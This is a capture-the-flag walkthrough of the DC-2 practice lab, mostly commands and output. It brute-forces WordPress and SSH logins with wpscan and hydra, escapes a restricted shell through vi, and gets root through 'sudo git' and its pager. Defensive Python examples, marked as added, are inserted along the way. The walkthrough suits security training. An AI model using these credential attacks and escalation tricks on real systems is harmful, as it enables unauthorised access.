DC-2 Walkthrough

Description

Much like DC-1, DC-2 is another purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing. As with the original DC-1, it’s designed with beginners in mind.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

Just like with DC-1, there are five flags including the final flag. The flags are important for beginners, but not so important for those who have experience.

In short, the only flag that really counts is the final flag.

Scanning

I loved the previous box and I was excited to solve this. So, without further ado, let’s start with our basic nmap scan to find out the open ports and services.

root :: ~ » nmap -A -p- 192.168.43.140
Nmap scan report for DC-2 (192.168.43.140)
Host is up (0.00067s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
|_http-generator: WordPress 4.7.10
|_http-server-header: Apache/2.4.10 (Debian)
| http-title: DC-2 – Just another WordPress site
|_Requested resource was http://dc-2/
7744/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey:
|   1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
|   2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
|   256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_  256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

As you can see, there are two open ports: what looks like a WordPress installation on port 80 and an out-of-the-ordinary SSH service on port 7744. I mean, it’s not the standard SSH port… After visiting the site, there was a menu named “Flag”. We are going pretty fast!

Finding the first flag.

Creating a custom wordlist

The clue was obvious to me. There is a tool called “cewl”, which spiders the target website and builds a wordlist from the words it finds there. I prepared my wordlist by typing the below command, where -d 3 specifies the spidering depth and -w <file> writes the resulting list of potential passwords to that file.

root :: /opt/cewl » ./cewl.rb -d 3 -w ~/Downloads/passwords.txt http://dc-2/
CeWL 5.4.5 (Exclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
root :: /opt/cewl » cd
root :: ~ » cd Downloads
root :: ~/Downloads » wc -c passwords.txt
    1689 passwords.txt
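As an added example (not part of the original post), here is a small CeWL-style extractor in Python together with a defensive use of it: checking whether a user's chosen password is just a word lifted from the site's own pages, which is exactly what makes the passwords found later in this walkthrough guessable. The HTML is a constructed stand-in for the DC-2 front page, not the real site content.

```python
import re
from html.parser import HTMLParser

# Constructed sample page standing in for http://dc-2/ (not the real site content).
SAMPLE_HTML = """<html><head><title>DC-2 - Just another WordPress site</title></head>
<body><h1>Welcome</h1><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit.
Nullam parturient montes nascetur ridiculus mus.</p>
<script>var x = "ignored";</script></body></html>"""


class TextExtractor(HTMLParser):
    """Collect the visible text of a page, skipping <script> and <style> bodies."""

    def __init__(self):
        super().__init__()
        self.chunks = []
        self._skip = 0

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.chunks.append(data)


def site_wordlist(html, min_length=3):
    """CeWL-style: unique lower-cased words of at least min_length letters from the page text."""
    parser = TextExtractor()
    parser.feed(html)
    words = re.findall(r"[A-Za-z]+", " ".join(parser.chunks))
    return sorted({w.lower() for w in words if len(w) >= min_length})


def password_from_site_content(password, wordlist):
    """True if the password is a site word, ignoring case and a trailing run of digits/symbols
    (so 'Parturient1!' is still caught). Use this as an extra rejection rule on password change."""
    core = re.sub(r"[\d!@#$%^&*]+$", "", password.lower())
    return core in set(wordlist)
```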

Wordpress enumeration

I successfully gathered 1689 words, but the login page is yet to be discovered. I ran nikto just in case, and I haven’t even mentioned wpscan yet, an excellent tool for WordPress sites that can also brute-force the login page! Let’s see what turned up!

root :: ~ » wpscan --enumerate --url http://dc-2/
_______________________________________________________________
        __          _______   _____
        \ \        / /  __ \ / ____|
        \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
        \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
        \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                    Version 2.9.4
        Sponsored by Sucuri - https://sucuri.net
    @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

[+] URL: http://dc-2/

[+] Interesting header: LINK: <http://dc-2/index.php/wp-json/>; rel="https://api.w.org/"
[+] Interesting header: LINK: <http://dc-2/>; rel=shortlink
[+] Interesting header: SERVER: Apache/2.4.10 (Debian)
[+] XML-RPC Interface available under: http://dc-2/xmlrpc.php   [HTTP 405]
[+] Found an RSS Feed: http://dc-2/index.php/feed/   [HTTP 200]
[!] Detected 1 user from RSS feed:
+-------+
| Name  |
+-------+
| admin |
+-------+
[!] Includes directory has directory listing enabled: http://dc-2/wp-includes/

[+] Enumerating WordPress version ...

[+] WordPress version 4.7.10 (Released on 2018-04-03) identified from meta generator, links opml
[!] 10 vulnerabilities identified from the version number

--- snip ---

[+] Enumerating usernames ...
[+] We identified the following 3 users:
    +----+-------+-------------+
    | ID | Login | Name        |
    +----+-------+-------------+
    | 1  | admin | admin       |
    | 2  | tom   | Tom Cat     |
    | 3  | jerry | Jerry Mouse |
    +----+-------+-------------+
[!] Default first WordPress username 'admin' is still used

--- snip ---

Well, it looks like we have more than one user to deal with. Let’s run wpscan again, but this time supply our custom password list. Here is the relevant information from the output:

root :: ~/Downloads » wpscan --url http://dc-2/ --wordlist passwords.txt

--- snip ---

[+] Starting the password brute forcer
Brute Forcing 'admin' Time: 00:00:09 <=============== > (237 / 239) 99.16%  ETA: 00:00:00
[+] [SUCCESS] Login : tom Password : parturient

[+] [SUCCESS] Login : jerry Password : adipiscing

Brute Forcing 'jerry' Time: 00:00:09 <=============== > (236 / 239) 98.74%  ETA: 00:00:00
+----+-------+-------------+------------+
| ID | Login | Name        | Password   |
+----+-------+-------------+------------+
| 1  | admin | admin       |            |
| 2  | tom   | Tom Cat     | parturient |
| 3  | jerry | Jerry Mouse | adipiscing |
+----+-------+-------------+------------+

--- snip ---

We found two passwords out of three. It’s not bad, right? Time to log in… First, I logged in as tom but didn’t find anything useful, so I switched to jerry. However, I found the next flag with jerry’s account in a blog post.

Finding the second flag.

Gaining access with SSH

I thought that searching for a working exploit or uploading a PHP reverse shell would be a waste of time. So, instead of doing all those, I tried to brute force the SSH service with the same wordlist and usernames (I created a text file for the three usernames).

root :: ~ » nvim users.txt
root :: ~ » hydra -L users.txt -P ~/Downloads/passwords.txt ssh://dc-2:7744
Hydra v8.9.1 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 714 login tries (l:3/p:238), ~45 tries per task
[DATA] attacking ssh://dc-2:7744/
[STATUS] 170.00 tries/min, 170 tries in 00:01h, 546 to do in 00:04h, 16 active
[STATUS] 124.67 tries/min, 374 tries in 00:03h, 342 to do in 00:03h, 16 active
[7744][ssh] host: dc-2   login: tom   password: parturient
1 of 1 target successfully completed, 1 valid password found

I got lucky with tom, because he re-used his WordPress account password…
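As an added example, not from the original post: a small detector for the kind of SSH brute-force Hydra generated above, run over constructed auth.log lines in the default Debian sshd format (the real DC-2 logs were not captured). It raises one alert when a source IP accumulates five failed logins within sixty seconds and a second one if that same IP then logs in successfully, which is the signature of a reused password being found by brute force.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample auth.log lines (sshd on DC-2 listens on 7744); not from a real host.
SAMPLE_AUTH_LOG = """\
Apr 13 10:15:01 DC-2 sshd[2001]: Failed password for admin from 192.168.43.1 port 51001 ssh2
Apr 13 10:15:02 DC-2 sshd[2002]: Failed password for admin from 192.168.43.1 port 51002 ssh2
Apr 13 10:15:02 DC-2 sshd[2003]: Failed password for tom from 192.168.43.1 port 51003 ssh2
Apr 13 10:15:03 DC-2 sshd[2004]: Failed password for jerry from 192.168.43.1 port 51004 ssh2
Apr 13 10:15:04 DC-2 sshd[2005]: Failed password for tom from 192.168.43.1 port 51005 ssh2
Apr 13 10:15:05 DC-2 sshd[2006]: Accepted password for tom from 192.168.43.1 port 51006 ssh2
Apr 13 11:30:00 DC-2 sshd[2100]: Failed password for tom from 192.168.43.77 port 40001 ssh2
Apr 13 11:45:00 DC-2 sshd[2101]: Accepted password for tom from 192.168.43.77 port 40002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+ ssh2$"
)


def detect_ssh_bruteforce(log_text, threshold=5, window_seconds=60, year=2019):
    """Return alerts as (ip, kind, detail). 'burst' = at least threshold failures inside the
    window; 'success_after_burst' = a login accepted from an IP that was already bursting."""
    failures = defaultdict(deque)   # ip -> timestamps of failures still inside the window
    bursting = set()
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")  # syslog has no year
        ip = m["ip"]
        if m["result"] == "Failed":
            q = failures[ip]
            q.append(ts)
            while (ts - q[0]).total_seconds() > window_seconds:   # slide the window forward
                q.popleft()
            if len(q) >= threshold and ip not in bursting:
                bursting.add(ip)
                alerts.append((ip, "burst", f"{len(q)} failures in {window_seconds}s"))
        elif ip in bursting:
            alerts.append((ip, "success_after_burst", f"user {m['user']}"))
    return alerts
```

A single failure followed by a success fifteen minutes later, as from 192.168.43.77 in the sample, stays below the threshold and produces no alert.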

root :: ~ » ssh tom@dc-2 -p 7744
The authenticity of host '[dc-2]:7744 ([192.168.43.140]:7744)' can't be established.
ECDSA key fingerprint is SHA256:ZbyT03GNDQgEmA5AMiTX2N685NTzZuOoyMDIA+DW1qU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[dc-2]:7744,[192.168.43.140]:7744' (ECDSA) to the list of known hosts.
tom@dc-2's password:

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
tom@DC-2:~$

Escaping rbash

The default shell for tom was rbash, a restricted Bash that, among other things, refuses output redirection and changes to $PATH; we want to escape it to gain better control over the system. I was reading about different techniques and decided to try a trick with the vi editor.

tom@DC-2:~$ -rbash: /dev/null: restricted: cannot redirect output
bash: _upvars: `-a0': invalid number specifier
-rbash: /dev/null: restricted: cannot redirect output
bash: _upvars: `-a0': invalid number specifier
tom@DC-2:~$ vi

Inside the editor, I typed :set shell=/bin/sh and finally :shell. This launches the standard Unix shell; from there, we can run /bin/bash to switch to the Bash shell. I also noticed that we were limited in usable commands because the $PATH environment variable only contained /home/tom/usr/bin. So, I added the missing directories and printed out the third flag.

$ /bin/bash
tom@DC-2:~$ echo $PATH
/home/tom/usr/bin
tom@DC-2:~$ export PATH=/bin/:/usr/bin/:/usr/local/bin:$PATH
tom@DC-2:~$ ls
flag3.txt  usr
tom@DC-2:~$ cat flag3.txt
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.

I have to admit, these hints are getting out of hand 😁

Lateral movement

I switched to jerry’s account using the previously acquired WordPress password. The fourth flag was in the home directory.

tom@DC-2:~$ su jerry
Password:
jerry@DC-2:/home/tom$ cd
jerry@DC-2:~$ ls
flag4.txt
jerry@DC-2:~$ cat flag4.txt
Good to see that you've made it this far - but you're not home yet.

You still need to get the final flag (the only flag that really counts!!!).

No hints here - you're on your own now.  :-)

Go on - git outta here!!!!

We got a pretty obvious hint again. I checked the allowed commands with sudo -l, and yes, we can indeed run the git command as root without knowing the root password.

jerry@DC-2:~$ sudo -l
Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git
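The sudo -l output above is exactly the kind of thing worth auditing on your own hosts. As an added example (not from the original post), here is a parser for that output that flags rules granting a user a binary which can open an editor or pager, and therefore a shell, as another user; the sample input is constructed in the same format as above and the list of risky binaries is a starting point, not a complete one.

```python
import re

# Constructed 'sudo -l' output in the format shown above; not captured from a real host.
SAMPLE_SUDO_L = """\
Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git
    (root) /usr/bin/apt-get update
    (www-data) NOPASSWD: /usr/bin/vi /var/www/html/*
"""

# Binaries that hand the user an editor or pager when run, and with it a shell as the
# run-as user. vi and git appear in this walkthrough; less/man are what 'git help' invokes.
SHELL_CAPABLE = {"vi", "vim", "git", "less", "more", "man"}

# One rule line: "(runas) [TAG: ...] /abs/path/to/binary [args]"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>/\S+)(?P<args>.*)$")


def audit_sudo_rules(sudo_l_output):
    """Parse 'sudo -l' text and return the rules that let the user reach a shell as someone else.
    NOPASSWD plus run-as root is rated high; anything else that still yields a shell is medium."""
    findings = []
    in_rules = False
    for line in sudo_l_output.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True        # everything after this header is a rule line
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        binary = m["cmd"].rsplit("/", 1)[-1]
        nopasswd = "NOPASSWD" in m["tags"]
        runas = m["runas"].strip()
        if binary in SHELL_CAPABLE:
            risk = "high" if (nopasswd and runas == "root") else "medium"
            findings.append({"cmd": m["cmd"], "runas": runas, "nopasswd": nopasswd, "risk": risk})
    return findings
```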

Root shell with Git

Luckily, git help opens the manual page in a pager, and the pager lets you run shell commands from inside it. I chose to simply execute a Bash shell. Finally, I printed out the final flag.

jerry@DC-2:~$ sudo git help status
root@DC-2:/home/jerry#
root@DC-2:/home/jerry# cd
root@DC-2:~# ls
final-flag.txt
root@DC-2:~# cat final-flag.txt
__    __     _ _       _                    _
/ / /\ \ \___| | |   __| | ___  _ __   ___  / \
\ \/  \/ / _ \ | |  / _` |/ _ \| '_ \ / _ \/  /
\  /\  /  __/ | | | (_| | (_) | | | |  __/\_/
\/  \/ \___|_|_|  \__,_|\___/|_| |_|\___\/


Congratulations!!!

A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.

If you enjoyed this CTF, send me a tweet via @DCAU7.
